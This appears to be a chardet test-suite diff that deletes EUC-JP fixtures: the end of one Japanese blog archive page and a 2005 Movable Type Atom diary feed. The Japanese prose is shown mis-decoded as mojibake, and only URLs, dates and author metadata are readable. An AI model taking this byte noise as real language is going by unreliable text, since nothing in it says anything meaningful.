ִֹµ­¡§¡ײ¥×¥י¥ף¥ְ₪ַ₪ֲֿחֻד₪ֿ¹חֻ¡¡׳₪ָ₪₪₪¦₪־₪ְֿµ³־₪ֹ½¸½₪ַ₪ֿ₪¢₪ך₪₪»₪ף₪ַ₪·₪¿¡£ ₪¢₪ָ¡¢ֲחֻד₪ֿ₪¿₪׀₪³₪ט₪ך³²₪¬¾¯₪₪₪₪ָ¸ְ₪ן₪ל₪ֶ₪₪₪₪¹₪¬¡¢₪¿₪׀₪³₪ט₪ך¥¿¡¼¥כ₪¬50%ֲ¿₪₪₪ָ₪₪₪¦ֳֿ₪ג₪¢₪ך¡¢ַ₪ֻ°­₪₪₪ָ₪₪₪¦₪־₪ֻ₪ֿׁ₪ן₪ך₪₪»₪ף¡£ »²¹ֽ¡§ֲחֻד... - - - - DVD₪ֻWMV¥ַ¡¼¥¿₪¬¼‎ֿ¿₪µ₪ל₪ל₪׀״ֽר? - http://artifact-jp.com/mt/archives/000474.html - ¥¢¥ב¥ך¥«₪ַ₪ֿ¥ֿ¥₪¥׃¥¸¥ח¥ףWMV9¥ַ¡¼¥¿₪ע¼‎ֿ¿₪·₪¿¡״¥¿¡¼¥¥ֽ¡¼¥¿¡¼2¡₪־DVD₪¬ֵ׀¾ל - - - - - CGA¥³¥ף¥ֶ¥¹¥ָ₪־÷מֹ₪־·¹¸‏ - http://artifact-jp.com/mt/archives/000473.html - ¡¡Doodle₪ַ¡ײCGA¥³¥ף¥ֶ¥¹¥ָ₪ַֹ¾²ֱ₪µ₪ל₪¬₪ֱ₪¥¹¥ָ¡¼¥ך¡¼₪ֶ¡¢ּ¯₪ֻ·מ´©¥¢¥ױ¥¿¥ּ¡¼¥ף₪¢₪¿₪ך₪ֻ÷₪ֳ₪ֶ₪½₪¦₪ּ¡²ט₪־₪½₪ל₪ֳ₪₪₪₪«₪ף₪¸₪¬₪¹₪כ¡׳₪ָ½ס₪«₪ל₪ֶ₪₪₪¿₪ף₪ַ₪¹₪¬¡¢ֱֿ÷מ¾¯ַ¯·ֿ₪־ֶ±¿ֽ»ן₪־ּ¡²ט¡¢¥³¥¥ֶ¥£¥¢₪ֳ₪₪₪₪ָ₪«₪ִֻּ₪÷₪כ₪ג₪־₪¬₪¢₪כ₪ף₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«₪ֽ¡£¥×¥¿¥¯₪־÷מ₪כ₪ֱ₪ח₪ֳ₪ָ₪₪₪₪ֳֿ·ֿ₪ָ₪₪₪¦₪«¡£ ¡¡¸·ּ©₪ֻ₪₪₪¦₪ָ¡¢ּ¡²ט₪ֿ¡ײ¿´₪ִֻֻ₪₪¡׳₪₪¿₪₪₪¥ֶ¥₪¥¹¥ָ₪¬₪¢₪כ₪±₪ֹ¡¢CGA₪־÷מֹ₪ֿ₪½₪¦₪₪₪¦ִֻ₪₪ֹפ¬₪ֿ¾¯₪₪₪´¶₪¸¡£ ¡¡DoGA₪־¥¹¥¿¥ֳ¥ױ₪־¿ֽ₪¬₪¢₪₪ך₪÷מֹ₪־ֵָֽפ₪ֳֻ²₪₪₪ֶ¥³¥ף¥ֶ¥¹¥ָ¹¶־¬¥¡¼¥¸₪ָ₪₪₪¦¥¡¼¥¸₪ע÷מ₪ֳ₪ֶ₪₪₪כ₪ף₪ַ₪¹₪¬¡¢¡ײּכֳז₪ֻ¿ֽ·ֱ¡¢₪×₪ג₪ֱ₪ד₪₪ֹ₪¬ֽ₪ך½׀₪¹₪ְ₪±¡׳₪ֻ₪ֿ₪ב₪ֱ₪ד₪¯₪ֱ₪ד¾׀₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿¡£₪¢₪כ₪¢₪כ!... - - - - »°ֹ©ֱם¹ח¸¦µז½ך₪־BLOG²עְג - http://artifact-jp.com/mt/archives/000472.html - ¥ײ¥ם¥°₪ֿ¿·₪·₪₪¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪ֻ₪₪ל₪כ₪« (2003/03/11)¡¡¡־»°ֹ©ֱם¹ח¸¦µז½ךֶג₪־½µ´© Take IT Easy₪ט₪ך¡ֿ ¡¡¥×¥×¥ִ¥ֽ₪µ₪ף₪־₪ָ₪³₪ם₪ֳַ־₪ֳ₪¿₪ף₪ַ₪¹₪¬¡¢₪₪ף₪«ַ§¼±₪¬ָשּ¯₪ֶֻז₪¥ֶ¥­¥¹¥ָ¡£₪ֿ₪ֶ₪¥¢¥ף¥ֶ¥₪¬₪₪כ₪ַ¥×¡¼¥׳¥ף¥½¡¼¥¹₪ִַף¶¡₪µ₪ל₪ֶ₪₪₪כ₪«₪־₪ט₪¦₪ֶֹֻ₪ב₪כ₪־₪ֿ₪₪÷₪₪₪־₪ַ₪ֿ¡ִ¡£ ¡¡ֲ¾₪־¸¾ֿ₪ג₪ֱ₪ח₪ֳ₪ֶָֹ₪ף₪ַ₪₪¿₪ף₪ַ₪¹₪¬¡¢₪×₪ֳ₪ָ»׳₪¨₪כ₪ט₪¦₪»כְֵ₪־¸¾ֿ₪ֳֶֿ₪ֻ₪₪·¡£¸¦µז½ך₪עּ¾¾ט₪כ₪«₪י₪ֻ₪ֿ¡¢₪ג₪¦₪ֱ₪ח₪ֳ₪ֶָֹ₪±‏₪¨₪־₪¢₪כ¸¾ֿ₪ע´ֲװ₪·₪ֶ₪·₪₪₪₪₪¹¡£... - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/atom.ycf.nanet.co.jp.xml b/chardet/tests/EUC-JP/atom.ycf.nanet.co.jp.xml deleted file mode 100644 index ee8dafe..0000000 --- a/chardet/tests/EUC-JP/atom.ycf.nanet.co.jp.xml +++ /dev/null @@ -1,360 +0,0 @@ - - - - ando₪־¥¡¼¥¸₪־»¨µ­ִ¢ - - 2005-12-31T16:24:19Z - ando₪־¥¡¼¥¸₪־»¨µ­ִ¢ - tag:www.ycf.nanet.co.jp,2006:/~dre/cgi-bin/diary//1 - Movable Type - Copyright (c) 2006, AND0 - - ₪µ₪ְ₪₪µ₪· - - 2005-12-31T16:24:19Z - 2006-01-01T01:22:43+09:00 - tag:www.ycf.nanet.co.jp,2006:/~dre/cgi-bin/diary//1.435 - 2005-12-31T16:22:43Z - ¿·ַ¯ֱב¡¹¡¢¡ײ₪×₪ה₪¸₪־°לָײִ¹₪₪ֶ¡׳₪ע¥־¡¼¥«¥ֳ¥ָ¡¢¥ױ¥כ¥³¡¼¥י¥¹₪ַ²־₪ֳ₪ֶ₪₪₪כ¡£ְ¸₪ַ²־₪¦₪־¡¢½י₪ב₪ֶ¸«₪¿¡£₪ה₪כ₪₪¢¡¢£־£ָ£ֻ¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ¿·ַ¯ֱב¡¹¡¢¡ײ₪×₪ה₪¸₪־°לָײִ¹₪₪ֶ¡׳₪ע¥־¡¼¥«¥ֳ¥ָ¡¢¥ױ¥כ¥³¡¼¥י¥¹₪ַ²־₪ֳ₪ֶ₪₪₪כ¡£ְ¸₪ַ²־₪¦₪־¡¢½י₪ב₪ֶ¸«₪¿¡£₪ה₪כ₪₪¢¡¢£־£ָ£ֻ¡£
    -

    ]]> - -
    -
    - - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ - - 2005-12-31T16:19:37Z - 2006-01-01T01:14:28+09:00 - tag:www.ycf.nanet.co.jp,2006:/~dre/cgi-bin/diary//1.434 - 2005-12-31T16:14:28Z - ²¿₪ָ₪«¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£ ₪₪¼»¨µ­ִ¢₪¬¹¹¿·₪ַ₪­₪₪₪₪«₪ָ¸ְ₪¨₪׀¡¢²ףְ‏₪¬₪¬₪ף₪¬₪ףְ₪ל₪ֶ₪·₪₪¦₪«₪י₪ַ₪¹¡£ ₪ג₪¦₪¹₪°²ףְ‏₪¬ֹµ¢₪¹₪כ₪־₪ַ₪×ֲװ₪ֱ²¼₪µ₪₪¡£ ַ¯²ל¾ץ₪ַ₪׃₪ֳ₪¯₪ך₪·₪¿‎¡¢¶ֳ₪«₪»₪ֶ₪´₪ב₪ף₪₪µ₪₪¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ²¿₪ָ₪«¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£
    -₪₪¼»¨µ­ִ¢₪¬¹¹¿·₪ַ₪­₪₪₪₪«₪ָ¸ְ₪¨₪׀¡¢²ףְ‏₪¬₪¬₪ף₪¬₪ףְ₪ל₪ֶ₪·₪₪¦₪«₪י₪ַ₪¹¡£
    -₪ג₪¦₪¹₪°²ףְ‏₪¬ֹµ¢₪¹₪כ₪־₪ַ₪×ֲװ₪ֱ²¼₪µ₪₪¡£
    -ַ¯²ל¾ץ₪ַ₪׃₪ֳ₪¯₪ך₪·₪¿‎¡¢¶ֳ₪«₪»₪ֶ₪´₪ב₪ף₪₪µ₪₪¡£

    ]]> - -
    -
    - - £ף£כ£ש£נ£ו¼ֲ¸³ - - 2005-12-14T15:52:13Z - 2005-12-15T00:47:29+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.432 - 2005-12-14T15:47:29Z - £ף£כ£ש£נ£ו₪ַ¡¢₪ֱ₪ח₪ֳ₪ָּµֳד₪¼ֲ¸³₪ע₪ה₪ֳ₪ֶ₪₪¿¡£ ₪³₪ֳ₪ֱ¡§£׳£י£מ£״£׀¡¡₪·₪«₪·²ףְ‏₪ֿ£¶£´£כ£ג£נ£ף ₪¢₪₪₪ֶ¡§£ֱ£ִ£׃£ּ¡¡£±£ֽ£ג£נ£ף¡¡₪·₪«₪·£׳£י£מ£ֽ£ו ₪ֹ₪ֳ₪ֱ₪ג¿ה¾©ָֿ°ֿ₪ַ₪ֿ₪₪₪¡£ ₪ִ₪₪°¡¦¡¦¡¦¡¦¡¦¡¦ְ®¸ש¡× ¸«»צ₪ְֲֻ³₪ַ₪­₪₪·₪¿¡£·כ¹½¹װ₪±₪כ₪¾¡¢£ף£כ£ש£נ£ו¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - £ף£כ£ש£נ£ו₪ַ¡¢₪ֱ₪ח₪ֳ₪ָּµֳד₪¼ֲ¸³₪ע₪ה₪ֳ₪ֶ₪₪¿¡£
    -₪³₪ֳ₪ֱ¡§£׳£י£מ£״£׀¡¡₪·₪«₪·²ףְ‏₪ֿ£¶£´£כ£ג£נ£ף
    -₪¢₪₪₪ֶ¡§£ֱ£ִ£׃£ּ¡¡£±£ֽ£ג£נ£ף¡¡₪·₪«₪·£׳£י£מ£ֽ£ו

    - -

    ₪ֹ₪ֳ₪ֱ₪ג¿ה¾©ָֿ°ֿ₪ַ₪ֿ₪₪₪¡£

    - -

    ₪ִ₪₪°¡¦¡¦¡¦¡¦¡¦¡¦ְ®¸ש¡×

    - -

    ¸«»צ₪ְֲֻ³₪ַ₪­₪₪·₪¿¡£·כ¹½¹װ₪±₪כ₪¾¡¢£ף£כ£ש£נ£ו¡£

    ]]> - -
    -
    - - ¥¥¦¥ף¥ֶ¥ף₪־₪·₪כ₪³¥¹¥ׁ - - 2005-12-14T17:57:38Z - 2005-12-14T02:56:04+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.433 - 2005-12-13T17:56:04Z - °ת₪ֳ±₪·₪גֽמ₪ֱֳו₪­¡¢₪₪¼₪«ֱֶֽ³¥¥¦¥ף¥ֶ¥ף₪ֻ¹װ₪­₪¿₪¯₪₪כ¡£ µ₪ֻ»׳₪₪־©₪ֳ₪¿₪־₪ַ¡¢ֶ±¹װ¼װ₪עֽ¶₪¦₪³₪ָ₪₪¯¡¢°ל¿ֽ₪ֵַ׀»³¸‎₪״¡£ ֵ¹₪־ֱ°₪ַ¡¢ֹװ»׳µִ₪ֶָ¬₪־ֳז₪ֻ₪·₪כ₪³¥¹¥ׁ₪¬ֹג₪«₪ײ¡£ »׳₪₪ְ₪ֳ₪ֶ¥·¥§¥כ¥ּׁµ₪·₪ֳַם¸¡¦¡¦¡¦₪¿₪₪כ¡¦¡¦¡¦₪¦₪₪₪¡×¡× ּֽ₪ֻ´ֵ₪₪¬־‎₪ך¹‏₪ף₪ַ₪₪₪₪₪₪¿₪ב¡¢¸«₪¿ּ₪ט₪ך₪ג₪¢₪ֳ₪µ₪ך₪·₪ֶ₪₪₪כ¡£ ₪½₪¦₪₪₪¨₪׀¡¢ְ־¡¢¾®ֱֻׂץֳד¥¹¥ׁ₪ִֻ©ְן₪·₪¿₪ָ₪­¡¢₪¢₪ף₪³₪¬ּµ₪¯₪₪ֳ₪¿»‏ְֵ₪ֱַרֶס₪·₪¿₪³₪ָ₪ע»׳₪₪½׀₪·₪¿¡£ ₪³₪־¥ׁ¥¹¥¿¡¢»ה₪־ֳז₪ַ₪ֿ¥ֱ¥ד¥ל¥ף¥¸¥ב¥ֻ¥ו¡¼₪ַ₪ֿ₪₪¯¡¢ִךָײ₪ָ₪·₪ֳֶם¸₪ַ₪­₪½₪¦₪µ₪₪¬₪¹₪כ¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - °ת₪ֳ±₪·₪גֽמ₪ֱֳו₪­¡¢₪₪¼₪«ֱֶֽ³¥¥¦¥ף¥ֶ¥ף₪ֻ¹װ₪­₪¿₪¯₪₪כ¡£
    -µ₪ֻ»׳₪₪־©₪ֳ₪¿₪־₪ַ¡¢ֶ±¹װ¼װ₪עֽ¶₪¦₪³₪ָ₪₪¯¡¢°ל¿ֽ₪ֵַ׀»³¸‎₪״¡£

    - -

    ֵ¹₪־ֱ°₪ַ¡¢ֹװ»׳µִ₪ֶָ¬₪־ֳז₪ֻ₪·₪כ₪³¥¹¥ׁ₪¬ֹג₪«₪ײ¡£

    - -

    »׳₪₪ְ₪ֳ₪ֶ¥·¥§¥כ¥ּׁµ₪·₪ֳַם¸¡¦¡¦¡¦₪¿₪₪כ¡¦¡¦¡¦₪¦₪₪₪¡×¡×

    - -

    ּֽ₪ֻ´ֵ₪₪¬־‎₪ך¹‏₪ף₪ַ₪₪₪₪₪₪¿₪ב¡¢¸«₪¿ּ₪ט₪ך₪ג₪¢₪ֳ₪µ₪ך₪·₪ֶ₪₪₪כ¡£
    -₪½₪¦₪₪₪¨₪׀¡¢ְ־¡¢¾®ֱֻׂץֳד¥¹¥ׁ₪ִֻ©ְן₪·₪¿₪ָ₪­¡¢₪¢₪ף₪³₪¬ּµ₪¯₪₪ֳ₪¿»‏ְֵ₪ֱַרֶס₪·₪¿₪³₪ָ₪ע»׳₪₪½׀₪·₪¿¡£

    - -

    ₪³₪־¥ׁ¥¹¥¿¡¢»ה₪־ֳז₪ַ₪ֿ¥ֱ¥ד¥ל¥ף¥¸¥ב¥ֻ¥ו¡¼₪ַ₪ֿ₪₪¯¡¢ִךָײ₪ָ₪·₪ֳֶם¸₪ַ₪­₪½₪¦₪µ₪₪¬₪¹₪כ¡£
    -

    ]]> - -
    -
    - - µ¡´ן³־ַ§ - - 2005-12-12T14:28:40Z - 2005-12-12T23:24:59+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.431 - 2005-12-12T14:24:59Z - °ת₪ֳ±₪·ְט₪־µ¡´ן₪־³־ַ§¡£ ₪₪ְ»ָ₪ֳ₪ֶ₪₪₪₪«₪ֳ₪¿¿©´ןְצ₪₪µ¡₪ָ¥¬¥¹°ב־א´¥ֱחµ¡₪ְָצֲץµ¡₪־¥ֶ¥¹¥ָ¡£ ְצֲץµ¡₪ָ°ב־א´¥ֱחµ¡₪ֿ¡¢₪¹₪´₪₪ְ­ַ½¡£₪·₪«₪ג¥¬¥¹ֲו·׳»»₪·₪¿₪י£±£¶±¡£°ֲ₪₪¡£ ₪·₪«₪·¡¦¡¦¡¦¿©´ןְצ₪₪µ¡₪ֿ»‏´ײ₪«₪«₪ך₪¹₪®¡£₪ִ₪₪₪ַ₪ֻ¸ְ₪¦₪ֵֵָµ₪¿©₪₪²ב₪®¡£ ₪³₪ל₪ֿ¥₪¥¥₪¥ֱ₪ְ₪ֳ₪¿¡£₪µ₪¹₪¬¥¥·¥ח¥¥כ¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - °ת₪ֳ±₪·ְט₪־µ¡´ן₪־³־ַ§¡£
    -₪₪ְ»ָ₪ֳ₪ֶ₪₪₪₪«₪ֳ₪¿¿©´ןְצ₪₪µ¡₪ָ¥¬¥¹°ב־א´¥ֱחµ¡₪ְָצֲץµ¡₪־¥ֶ¥¹¥ָ¡£
    -ְצֲץµ¡₪ָ°ב־א´¥ֱחµ¡₪ֿ¡¢₪¹₪´₪₪ְ­ַ½¡£₪·₪«₪ג¥¬¥¹ֲו·׳»»₪·₪¿₪י£±£¶±¡£°ֲ₪₪¡£
    -₪·₪«₪·¡¦¡¦¡¦¿©´ןְצ₪₪µ¡₪ֿ»‏´ײ₪«₪«₪ך₪¹₪®¡£₪ִ₪₪₪ַ₪ֻ¸ְ₪¦₪ֵֵָµ₪¿©₪₪²ב₪®¡£
    -₪³₪ל₪ֿ¥₪¥¥₪¥ֱ₪ְ₪ֳ₪¿¡£₪µ₪¹₪¬¥¥·¥ח¥¥כ¡£

    ]]> - -
    -
    - - °ת₪ֳ±₪·´°־» - - 2005-12-11T11:45:33Z - 2005-12-11T20:42:04+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.430 - 2005-12-11T11:42:04Z - °ת₪ֳ±₪·´°־»¡£₪·₪«₪·¥ֽ¥ֳ¥ָ³«ִּֽ½ִך₪ּֿ₪ִך¡£ ₪ָ₪ך₪¢₪¨₪÷»ֳִך²ףְ‏₪ֿ³־¡£₪·₪«₪·£¶£´£כ¡£ ₪·₪«₪ג¡¢₪₪¼₪«¥ב¡¼¥כ₪¬·ׂ₪¬₪י₪₪₪¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - °ת₪ֳ±₪·´°־»¡£₪·₪«₪·¥ֽ¥ֳ¥ָ³«ִּֽ½ִך₪ּֿ₪ִך¡£
    -₪ָ₪ך₪¢₪¨₪÷»ֳִך²ףְ‏₪ֿ³־¡£₪·₪«₪·£¶£´£כ¡£
    -₪·₪«₪ג¡¢₪₪¼₪«¥ב¡¼¥כ₪¬·ׂ₪¬₪י₪₪₪¡£

    ]]> - -
    -
    - - °ת₪ֳ±₪·½אָק - - 2005-12-05T14:23:41Z - 2005-12-05T23:16:19+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.429 - 2005-12-05T14:16:19Z - ₪ָ¸ְ₪ֳ₪ֶ₪ג¡¢÷­ס₪×ַ₪₪»₪ַ₪×´ך₪₪₪·₪ֶ₪₪₪כ₪־₪ַ¡¢¾²₪־¾ו₪ֻ»¶₪י₪׀₪ֳ₪¿₪ג₪־₪־ְ°ֽ‎₪ָ¡¢°ת₪ֳ±₪·²°₪־ֵ¨¡¢ֵֵµ₪ְַ‏₪־¼ט₪ך₪₪÷₪·₪¬¥ב¥₪¥ף¡£ ֳֶ₪ֻ²ז₪¬²ָ₪ֿ¡¢¥¢¥ף¥ֶ¥¥±¡¼¥ײ¥כ₪¬₪ָ₪°₪ם₪ע´¬₪₪₪ֶ₪₪₪כ₪־₪ָ¡¢ֳֵֵֿ·ֿ₪¬£ף£כ£ש£נ£וֽׁ¥״¥ֳ¥ֹ¥»¥ֳ¥ָ₪ע²‏ֲ₪₪·₪ֶ¥פ¥£¥ל¥ֳ¥¸¥׀¥ף¥¬¡¼¥ֹ₪ַַד₪ֳ₪¿ֳֵֵֿµ¡₪ֻ·ׂ₪₪₪ַ₪₪₪כ₪־₪ַ¡¢₪³₪ל₪ְ₪±₪ְֿהֲ׀₪ֻ³°₪·₪ֶ₪×₪₪₪ֶ₪¯₪ְ₪µ₪₪₪ַָ°₪ע²¡₪µ₪ל₪¿¡£ »ָ₪¨₪₪₪¥´¥₪גֲ¿₪₪₪¬¡¢₪ָ₪ך₪¢₪¨₪÷¿·µן₪ֻ»‎₪ֳ₪ֶ¹װ₪¯¡£¥ה¥ױ¥×¥¯₪ַַה₪כ₪«₪₪¡¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ₪ָ¸ְ₪ֳ₪ֶ₪ג¡¢÷­ס₪×ַ₪₪»₪ַ₪×´ך₪₪₪·₪ֶ₪₪₪כ₪־₪ַ¡¢¾²₪־¾ו₪ֻ»¶₪י₪׀₪ֳ₪¿₪ג₪־₪־ְ°ֽ‎₪ָ¡¢°ת₪ֳ±₪·²°₪־ֵ¨¡¢ֵֵµ₪ְַ‏₪־¼ט₪ך₪₪÷₪·₪¬¥ב¥₪¥ף¡£
    -ֳֶ₪ֻ²ז₪¬²ָ₪ֿ¡¢¥¢¥ף¥ֶ¥¥±¡¼¥ײ¥כ₪¬₪ָ₪°₪ם₪ע´¬₪₪₪ֶ₪₪₪כ₪־₪ָ¡¢ֳֵֵֿ·ֿ₪¬£ף£כ£ש£נ£וֽׁ¥״¥ֳ¥ֹ¥»¥ֳ¥ָ₪ע²‏ֲ₪₪·₪ֶ¥פ¥£¥ל¥ֳ¥¸¥׀¥ף¥¬¡¼¥ֹ₪ַַד₪ֳ₪¿ֳֵֵֿµ¡₪ֻ·ׂ₪₪₪ַ₪₪₪כ₪־₪ַ¡¢₪³₪ל₪ְ₪±₪ְֿהֲ׀₪ֻ³°₪·₪ֶ₪×₪₪₪ֶ₪¯₪ְ₪µ₪₪₪ַָ°₪ע²¡₪µ₪ל₪¿¡£
    -»ָ₪¨₪₪₪¥´¥₪גֲ¿₪₪₪¬¡¢₪ָ₪ך₪¢₪¨₪÷¿·µן₪ֻ»‎₪ֳ₪ֶ¹װ₪¯¡£¥ה¥ױ¥×¥¯₪ַַה₪כ₪«₪₪¡¡£

    ]]> - -
    -
    - - ¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿· - - 2005-12-01T18:43:46Z - 2005-12-02T03:41:38+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.428 - 2005-12-01T18:41:38Z - ֱ°²ף₪«₪י£±¥צ·מ¼ו₪ַ¡¢¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£ ₪₪ס¢¥ָ¥ֳ¥׳₪ֻ½ס₪₪₪¿₪ָ₪×₪ך¡¢₪·₪׀₪י₪¯¥¢¥¯¥»¥¹ֹװ²ִ₪ֻ₪₪כ²ִַ½ְ­₪¬₪¢₪ך₪₪¹₪¬₪´־»¾µ´ך₪₪₪₪¹¡£ ּ²₪₪¡¦¡¦¡¦¿²₪₪¹¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ֱ°²ף₪«₪י£±¥צ·מ¼ו₪ַ¡¢¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£

    - -

    ₪₪ס¢¥ָ¥ֳ¥׳₪ֻ½ס₪₪₪¿₪ָ₪×₪ך¡¢₪·₪׀₪י₪¯¥¢¥¯¥»¥¹ֹװ²ִ₪ֻ₪₪כ²ִַ½ְ­₪¬₪¢₪ך₪₪¹₪¬₪´־»¾µ´ך₪₪₪₪¹¡£

    - -

    ּ²₪₪¡¦¡¦¡¦¿²₪₪¹¡£

    ]]> - -
    -
    - - ¥¬¥ף¥ְ¥א₪־£ֳ£ֽ¡ְ¸¶¨₪־ַעְ׀₪µ₪ף¡ֻ - - 2005-11-22T14:56:59Z - 2005-11-23T00:04:15+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.427 - 2005-11-22T15:04:15Z - ´´ײ¸ֲִך¥ֽ¥¿¡£ ¥¬¥ף¥ְ¥א₪־£ֳ£ֽ¡¢ְ¸¶¨₪־ַעְ׀₪µ₪ף¥׀¡¼¥¸¥ח¥ף¡¢£±£±¡¿£³£°₪₪ַ₪־´´ײ¸ֲִך¸ר³«¡£ £ֳ£ֽ¸«₪ל₪₪₪¿ֽ₪ג₪³₪ל₪₪י°ֲ¿´¡£ ¸ִ¿ֵֽ×₪ֻ₪ֿ¡¢¥¡¼¥¸±¦ֲ¦₪־₪ׂ₪ָ₪³₪ָ¥«¡¼¥ֹ₪־‎₪¬±ֱַ₪ט₪ך₪גַּּע₪₪¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - etc - - ´´ײ¸ֲִך¥ֽ¥¿¡£
    -¥¬¥ף¥ְ¥א₪־£ֳ£ֽ¡¢ְ¸¶¨₪־ַעְ׀₪µ₪ף¥׀¡¼¥¸¥ח¥ף¡¢£±£±¡¿£³£°₪₪ַ₪־´´ײ¸ֲִך¸ר³«¡£
    -£ֳ£ֽ¸«₪ל₪₪₪¿ֽ₪ג₪³₪ל₪₪י°ֲ¿´¡£

    - -

    ¸ִ¿ֵֽ×₪ֻ₪ֿ¡¢¥¡¼¥¸±¦ֲ¦₪־₪ׂ₪ָ₪³₪ָ¥«¡¼¥ֹ₪־‎₪¬±ֱַ₪ט₪ך₪גַּּע₪₪¡£

    ]]> - -
    -
    - - ¥׳¥י¥ֱ¥³־ִך - - 2005-11-21T16:57:32Z - 2005-11-22T01:53:21+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.426 - 2005-11-21T16:53:21Z - ₪₪₪ה¡¢ֹּ¸₪ֻ₪ֿ₪·₪ֶ₪¿₪ף₪ְ₪±₪ֹ¡¢₪₪µ₪«£±£±·מ₪ֳֻ£ְ®₪ַ₪­₪כ₪ָ₪ֿ¡¦¡¦¡¦ £ֱ£־£ֱ¥׳¥י¥ֱ¥¥ב¥ף¥׀¡¼¥÷ֳ£ְ®¡£¡₪·₪«₪ג¹סֶגְ‏₪־₪¡ֻ ¥¹¥¿¡¼¥¢¥י¥₪¥¢¥ף¥¹¥´¡¼¥כ¥ֹ₪ג₪ִ₪₪₪ֶ₪¯₪כ¡£ °ל»³ִ¶₪¨₪¿´¶₪¸¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ₪₪₪ה¡¢ֹּ¸₪ֻ₪ֿ₪·₪ֶ₪¿₪ף₪ְ₪±₪ֹ¡¢₪₪µ₪«£±£±·מ₪ֳֻ£ְ®₪ַ₪­₪כ₪ָ₪ֿ¡¦¡¦¡¦
    -£ֱ£־£ֱ¥׳¥י¥ֱ¥¥ב¥ף¥׀¡¼¥÷ֳ£ְ®¡£¡₪·₪«₪ג¹סֶגְ‏₪־₪¡ֻ
    -¥¹¥¿¡¼¥¢¥י¥₪¥¢¥ף¥¹¥´¡¼¥כ¥ֹ₪ג₪ִ₪₪₪ֶ₪¯₪כ¡£

    - -

    °ל»³ִ¶₪¨₪¿´¶₪¸¡£

    ]]> - -
    -
    - - ¥¦¥£¥כ¥¹ - - 2005-11-21T16:49:54Z - 2005-11-21T23:46:36+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.425 - 2005-11-21T14:46:36Z - ÷ַ¶בֶ°₪­₪¬ֶ₪₪¡£₪ָ»׳₪ֳ₪ֶ¡¢¥־¡¼¥ָ¥ף¥¢¥ף¥ֱ¥¦¥£¥כ¥¹µ¯ֶ°₪·₪ֶ¡¢¼ךֶ°₪ַ¸¡÷ק₪·₪¿₪י¡¦¡¦¡¦ £´ֹ₪ָ¯¸«¡£ ³טֶ°₪ֿ₪·₪ֶ₪₪₪₪«₪ֳ₪¿₪ט₪¦₪ְ₪¬¡£ ₪·₪«₪·¡¢₪₪ף₪ַ¼«ֶ°¸¡½׀₪ַ₪­₪₪«₪ֳ₪¿₪־₪ְ₪ם₪¦¡¦¡¦¡¦¡¡¥­¥ף¥°¥½¥ױ¥ָ₪ֻ¾ט₪ך´¹₪¨₪כ₪«₪¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ÷ַ¶בֶ°₪­₪¬ֶ₪₪¡£₪ָ»׳₪ֳ₪ֶ¡¢¥־¡¼¥ָ¥ף¥¢¥ף¥ֱ¥¦¥£¥כ¥¹µ¯ֶ°₪·₪ֶ¡¢¼ךֶ°₪ַ¸¡÷ק₪·₪¿₪י¡¦¡¦¡¦
    -£´ֹ₪ָ¯¸«¡£
    -³טֶ°₪ֿ₪·₪ֶ₪₪₪₪«₪ֳ₪¿₪ט₪¦₪ְ₪¬¡£
    -₪·₪«₪·¡¢₪₪ף₪ַ¼«ֶ°¸¡½׀₪ַ₪­₪₪«₪ֳ₪¿₪־₪ְ₪ם₪¦¡¦¡¦¡¦¡¡¥­¥ף¥°¥½¥ױ¥ָ₪ֻ¾ט₪ך´¹₪¨₪כ₪«₪¡£

    ]]> - -
    -
